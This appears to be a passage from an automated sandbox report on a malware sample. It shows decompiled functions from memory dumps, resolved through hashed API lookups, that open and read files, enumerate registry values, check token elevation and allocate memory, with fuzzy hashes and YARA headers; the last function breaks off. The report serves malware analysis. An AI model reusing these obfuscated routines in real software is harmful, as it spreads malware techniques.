Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4e60b51493a919b9ab3b1fbe95255e1ef887842d4da31704ea387d1a5e3b98bf
Instruction ID: 5e94f688ef9769b1ae49d6f43edf978f5d3fb060d27acbe6cb3159b8ba8bd1af
Opcode Fuzzy Hash: 4e60b51493a919b9ab3b1fbe95255e1ef887842d4da31704ea387d1a5e3b98bf
Instruction Fuzzy Hash: 9501453BB9432BBFF71016685D42F7B33CCDF8225CF408026BA104A191DF2699498071

Uniqueness

Uniqueness Score: -1.00%

Function 6F035BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E6F035BBD(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E6F03303C(0x10154545, 0xdb1c336e) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E6F02C2B0(_t24);
					if(E6F02C2C4(_t24) != 0) {
						_t33[2] = E6F0335C8(0x80000000);
						_t12 = 0;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E6F03303C(0x10154545, 0x95343033);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E6F033670(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						if(E6F03303C(0x10154545, 0x5b739044) != 0) {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							asm("int3");
						}
						_t12 = 1;
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
				}
				return _t12;
			}

0x6f035bbd
0x6f035bbf
0x6f035bd6
0x6f035be1
0x6f035bea
0x6f035bf0
0x6f035bf1
0x6f035be3
0x6f035be5
0x6f035be5
0x6f035c07
0x6f035c1b
0x6f035c09
0x6f035c16
0x6f035c18
0x6f035c18
0x6f035c1d
0x6f035c22
0x6f035c30
0x6f035c9b
0x6f035c9e
0x6f035c32
0x6f035c37
0x6f035c84
0x6f035c88
0x6f035c92
0x6f035c92
0x6f035c88
0x6f035c39
0x6f035c45
0x6f035c4a
0x6f035c5e
0x6f035c60
0x6f035c61
0x6f035c62
0x6f035c64
0x6f035c66
0x6f035c67
0x6f035c67
0x6f035c6a
0x6f035c6a
0x6f035bc1
0x6f035bc1
0x6f035bc8
0x6f035bc8
0x6f035c72

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,10154545,DB1C336E), ref: 6F035C16

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: af98b8f18d4404483ce410ac0791fe4c6811433ebfb8a47cf56fbae2f89ab8d8
Instruction ID: 6ebd8db39278583ab45102308dba699b3fe0f203832d5312e7cdf42ccbe032fe
Opcode Fuzzy Hash: af98b8f18d4404483ce410ac0791fe4c6811433ebfb8a47cf56fbae2f89ab8d8
Instruction Fuzzy Hash: 2F01493BB9472BBFF71016288D82F7B73DDDF4225CF404425FA114A191DF26A5588171

Uniqueness

Uniqueness Score: -1.00%

Function 6F035BA9, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E6F035BA9(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6F03303C(0x10154545, 0xdb1c336e) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6F02C2B0(_t24);
				if(E6F02C2C4(_t24) != 0) {
					_t34[2] = E6F0335C8(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E6F03303C(0x10154545, 0x95343033);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E6F033670(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					if(E6F03303C(0x10154545, 0x5b739044) != 0) {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6f035ba9
0x6f035bb0
0x6f035bb3
0x6f035be1
0x6f035bea
0x6f035bf0
0x6f035bf1
0x6f035be3
0x6f035be5
0x6f035be5
0x6f035c07
0x6f035c1b
0x6f035c09
0x6f035c16
0x6f035c18
0x6f035c18
0x6f035c1d
0x6f035c22
0x6f035c30
0x6f035c9b
0x6f035c9e
0x6f035c32
0x6f035c37
0x6f035c84
0x6f035c88
0x6f035c92
0x6f035c92
0x6f035c88
0x6f035c39
0x6f035c45
0x6f035c4a
0x6f035c5e
0x6f035c60
0x6f035c61
0x6f035c62
0x6f035c64
0x6f035c66
0x6f035c67
0x6f035c67
0x6f035c6a
0x6f035c6a
0x6f035c72

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,10154545,DB1C336E), ref: 6F035C16

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 248abc8278b108dcb72a520057f01ca454ba875b19e9f6d69c272cda014ad45b
Instruction ID: 912cf96bd42f944133fee963c841e51f62c80257575015fcc9517f23a2b4a7a8
Opcode Fuzzy Hash: 248abc8278b108dcb72a520057f01ca454ba875b19e9f6d69c272cda014ad45b
Instruction Fuzzy Hash: 0E01F53BB9432BBFF71016689D82F7B32C9DB8225CF404426FA118A1D2DF2A99598161

Uniqueness

Uniqueness Score: -1.00%

Function 6F035B8B, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6F035B8B(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6F03303C(0x10154545, 0xdb1c336e) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6F02C2B0(_t23);
				if(E6F02C2C4(_t23) != 0) {
					_t31[2] = E6F0335C8(0x100);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6F03303C(0x10154545, 0x95343033);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6F033670(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6F03303C(0x10154545, 0x5b739044) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6f035b8b
0x6f035b92
0x6f035be1
0x6f035bea
0x6f035bf0
0x6f035bf1
0x6f035be3
0x6f035be5
0x6f035be5
0x6f035c07
0x6f035c1b
0x6f035c09
0x6f035c16
0x6f035c18
0x6f035c18
0x6f035c1d
0x6f035c22
0x6f035c30
0x6f035c9b
0x6f035c9e
0x6f035c32
0x6f035c37
0x6f035c84
0x6f035c88
0x6f035c92
0x6f035c92
0x6f035c88
0x6f035c39
0x6f035c45
0x6f035c4a
0x6f035c5e
0x6f035c60
0x6f035c61
0x6f035c62
0x6f035c64
0x6f035c66
0x6f035c67
0x6f035c67
0x6f035c6a
0x6f035c6a
0x6f035c72

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,10154545,DB1C336E), ref: 6F035C16

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 00fa6ef5887d1bdad0ac7746f795d9921ccfac813361a82efda2e71ea79cc166
Instruction ID: 87e9b3cfe4f5bb49222a6c98512e4104d2004f141262d621542eeb4263ed1122
Opcode Fuzzy Hash: 00fa6ef5887d1bdad0ac7746f795d9921ccfac813361a82efda2e71ea79cc166
Instruction Fuzzy Hash: 0301473BB9432BBFF71016288D82FBB33CCDF4225CF404426BA105A1D1DF26A9588171

Uniqueness

Uniqueness Score: -1.00%

Function 6F035BD9, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6F035BD9(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6F03303C(0x10154545, 0xdb1c336e) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6F02C2B0(_t23);
				if(E6F02C2C4(_t23) != 0) {
					_t31[2] = E6F0335C8(0);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6F03303C(0x10154545, 0x95343033);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6F033670(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6F03303C(0x10154545, 0x5b739044) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6f035bd9
0x6f035bdd
0x6f035be1
0x6f035bea
0x6f035bf0
0x6f035bf1
0x6f035be3
0x6f035be5
0x6f035be5
0x6f035c07
0x6f035c1b
0x6f035c09
0x6f035c16
0x6f035c18
0x6f035c18
0x6f035c1d
0x6f035c22
0x6f035c30
0x6f035c9b
0x6f035c9e
0x6f035c32
0x6f035c37
0x6f035c84
0x6f035c88
0x6f035c92
0x6f035c92
0x6f035c88
0x6f035c39
0x6f035c45
0x6f035c4a
0x6f035c5e
0x6f035c60
0x6f035c61
0x6f035c62
0x6f035c64
0x6f035c66
0x6f035c67
0x6f035c67
0x6f035c6a
0x6f035c6a
0x6f035c72

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,10154545,DB1C336E), ref: 6F035C16

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d0d726669103ef7940454dcf0769a0aed0f78bab63332eae32121ffa5bcface0
Instruction ID: 897bc8315ac4380d2b279b33244f68135425055d26d56a367da0b2a93d2baf1d
Opcode Fuzzy Hash: d0d726669103ef7940454dcf0769a0aed0f78bab63332eae32121ffa5bcface0
Instruction Fuzzy Hash: A7017B3BB9032B7FF31016648D82F7B778CDF4225CF404426BA114A1D1DF26A558C0B1

Uniqueness

Uniqueness Score: -1.00%

Function 6F035DE8, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6F035DE8(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E6F02C2C4(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E6F03303C(0x10154545, 0x95343033) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x6f035dec
0x6f035ded
0x6f035def
0x6f035df5
0x6f035df7
0x6f035dfb
0x6f035dfb
0x6f035dff
0x6f035e0b
0x6f035e3f
0x6f035e3f
0x00000000
0x6f035e0d
0x6f035e12
0x6f035e13
0x6f035e27
0x6f035e38
0x6f035e29
0x6f035e34
0x6f035e34
0x6f035e3d
0x6f035e45
0x6f035e47
0x6f035e4a
0x6f035e4f
0x6f035e4f
0x6f035e53
0x6f035e58
0x00000000
0x00000000
0x00000000
0x6f035e3d

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,95343033,?,?,00000000,00000000,?,6F035D20,?,?), ref: 6F035E34

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9e3610dd58a55eb24f930a89009a13b7e31f7bd55967db0f474f4867ce3f2456
Instruction ID: 89207c4c2ecb1fc3dc8a9c524b2a7635f143fc481af2fb379eba313180d0ccb0
Opcode Fuzzy Hash: 9e3610dd58a55eb24f930a89009a13b7e31f7bd55967db0f474f4867ce3f2456
Instruction Fuzzy Hash: 21F0F93BE097336AD7145D3C9D40BBB63D5DF96724F104F2AE551AB190EB70D4844291

Uniqueness

Uniqueness Score: -1.00%

Function 6F035624, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F035624(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E6F03303C(0x8b9d0da7, 0x73b21bac) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E6F02E670(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x6f03562e
0x6f035630
0x6f035637
0x6f035639
0x6f03563d
0x6f03563f
0x6f035642
0x6f035645
0x6f035645
0x6f03565f
0x00000000
0x00000000
0x6f035670
0x6f035674
0x00000000
0x00000000
0x6f035682
0x6f035685
0x6f03568a
0x6f03568f
0x6f03568f

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,8B9D0DA7,73B21BAC,?,?,8B9D0DA7,73B21BAC), ref: 6F035670

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: 452d68462d9db491265cc3f6ca4d221dd0685bf87e9696235c65e9b146e9e260
Instruction ID: edde197c66e9ef955ba79fd0370894ccb5ee364a8481f59111756cb96253cec4
Opcode Fuzzy Hash: 452d68462d9db491265cc3f6ca4d221dd0685bf87e9696235c65e9b146e9e260
Instruction Fuzzy Hash: C8F0C8BA60431A7EE7205E1ACC54EB7BBEDEBD1754F00852EB4D543250DA31AC1089B0

Uniqueness

Uniqueness Score: -1.00%

Function 6F035E5C, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F035E5C(void* __ecx, void* __eflags, void* _a4, long _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E6F02C2C4(_t19) == 0) {
					_v12 = _a8;
					if(E6F03303C(0x10154545, 0x73afd997) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E6F0335C8(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x6f035e5f
0x6f035e61
0x6f035e6d
0x6f035e77
0x6f035e8d
0x6f035eac
0x6f035e8f
0x6f035ea0
0x6f035ea4
0x6f035ec4
0x6f035ea6
0x6f035ea6
0x6f035ea6
0x6f035ea4
0x6f035ead
0x6f035eb2
0x6f035ebb
0x6f035eb4
0x6f035eb4
0x6f035eb6
0x6f035eb6
0x6f035e6f
0x6f035e6f
0x6f035e6f
0x6f035ec1

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,10154545,73AFD997,?,?,?,6F035D51,00000000,?,00000000,?), ref: 6F035EA0

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: ff6b83ae53a14c7969036b25046835b6a8ee2cec4344305c903d2b4d1bdfae31
Instruction ID: 4f564e43dc8cb9c2b9434b52dda9e9946ba7222f0c471b3e73cd74d4b63d4ee4
Opcode Fuzzy Hash: ff6b83ae53a14c7969036b25046835b6a8ee2cec4344305c903d2b4d1bdfae31
Instruction Fuzzy Hash: 81F0A937B48317AFD7559A7CCE40BBB77D6AF49250F014D2AA8A5C72A0EB31D4058621

Uniqueness

Uniqueness Score: -1.00%

Function 6F031054, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E6F031054(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E6F033044(0x8b9d0da7, 0x8335dc52, 0x8b9d0da7, 0x8b9d0da7);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E6F033044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0x8b9d0da3
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x6f031062
0x6f031064
0x6f031072
0x6f031076
0x6f0310bf
0x00000000
0x6f0310bf
0x6f03107b
0x6f03107c
0x6f03107e
0x6f031083
0x00000000
0x6f03109c
0x6f0310a0
0x6f0310ad
0x6f0310b1
0x00000000
0x00000000
0x00000000
0x6f0310ba

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,8B9D0DA3,00000004,8B9D0DA7,8B9D0DA7,8B9D0DA7), ref: 6F0310AD

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 8e5cf5bb2e0746a9efef4d9230d436ccf5801192ed412a820cf8093eb6220fb6
Instruction ID: 830c362a79c2f7b083c606a65c1bd2a4afc45c264f6ef8eea84c35308065439b
Opcode Fuzzy Hash: 8e5cf5bb2e0746a9efef4d9230d436ccf5801192ed412a820cf8093eb6220fb6
Instruction Fuzzy Hash: 07F0C271B48353ABEB0095798C15F7B62DFABC8704F00C939B540CB190EEB8D9448622

Uniqueness

Uniqueness Score: -1.00%

Function 6F033600, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E6F033600(void* __ecx) {
				void* _t3;
				intOrPtr* _t7;
				void* _t9;

				_t9 = __ecx;
				if( *0x6f03d228 == 0x8c456a83) {
					_t7 = E6F03303C(0xfe338407, 0x82fffbdc);
					 *0x6f03d22c = E6F03303C(0xfe338407, 0xc09bf2f8);
					if( *0x6f03d228 == 0x8c456a83) {
						 *_t7(2, 0, 0, 0, 0, 0); // executed
						 *0x6f03d228 = 0;
					}
				}
				_t3 = E6F03303C(0xfe338407, 0xdb278333);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t9);
					_push(8);
					_push( *0x6f03d228);
					asm("int3");
					asm("int3");
					return _t3;
				}
			}

0x6f033608
0x6f033610
0x6f033643
0x6f033654
0x6f03365f
0x6f03366a
0x6f03366c
0x6f03366c
0x6f03365f
0x6f03361c
0x6f033623
0x00000000
0x6f033625
0x6f033625
0x6f033626
0x6f033628
0x6f03362a
0x6f03362b
0x00000000
0x6f03362b

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,FE338407,C09BF2F8,FE338407,82FFFBDC,?,?,00000000,6F02DE41,?,?), ref: 6F03366A

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 6fe23628901417c9cad658f8b0be28899b62898b42a297b7e5f0b99fd71d8a29
Instruction ID: 120a3228e331b0757df319465a35d17e29464692c86e6c38c598f96c703e394e
Opcode Fuzzy Hash: 6fe23628901417c9cad658f8b0be28899b62898b42a297b7e5f0b99fd71d8a29
Instruction Fuzzy Hash: A8F0593BA44173BDF3201AB19E86F57F184DB4D360B308829B580C37C0D92184428225

Uniqueness

Uniqueness Score: -1.00%

Function 027B1E9D, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 027B1F29

Memory Dump Source

Source File: 00000003.00000002.870278217.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction ID: c87c95a76c425473be022baf8ece07bc6c65bf7958d797b7071a8d9995708170
Opcode Fuzzy Hash: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction Fuzzy Hash: 5D41B1B5E0521A8FDB04DFA8C4946AEBBF1FF48314F19856AE848AB340D375A840CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6F021494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E6F021494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E6F02F5A8( &_v72, 0);
				_v60 = 0x790529cb;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E6F02F84C( &_v76, E6F02F4F0( &_v76) + 0x10);
				E6F02F4E0( &_v80, E6F02F4F0( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0xdee5e4fb;
				asm("movq [ecx+0x18], xmm0");
				E6F02F84C( &_v84, E6F02F4F0(_t325) + 0x10);
				E6F02F4E0( &_v88, E6F02F4F0( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0xeabbe5b1;
				asm("movq [ecx+0x18], xmm0");
